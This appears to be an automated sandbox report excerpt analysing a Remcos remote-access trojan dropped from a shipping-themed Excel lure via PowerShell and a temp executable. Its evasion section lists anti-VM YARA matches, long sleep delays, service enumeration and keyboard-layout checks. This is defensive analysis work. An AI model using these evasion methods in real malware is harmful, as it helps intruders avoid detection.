                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: Shipping Document PLBL003534.xlsStream path 'Workbook' entropy: 7.91814259565 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM_3Show sources
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260417476.0000000002275000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2233130392.0000000002391000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233337169.00000000021FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2198158446.00000000022F3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2233190842.00000000023C2000.00000004.00000001.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\sm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 692Thread sleep time: -49883s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 600Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 972Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2472Thread sleep time: -49964s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1544Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2428Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2928Thread sleep time: -51291s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1776Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2456Thread sleep count: 333 > 30
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2456Thread sleep time: -3330000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2088Thread sleep time: -50128s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2172Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
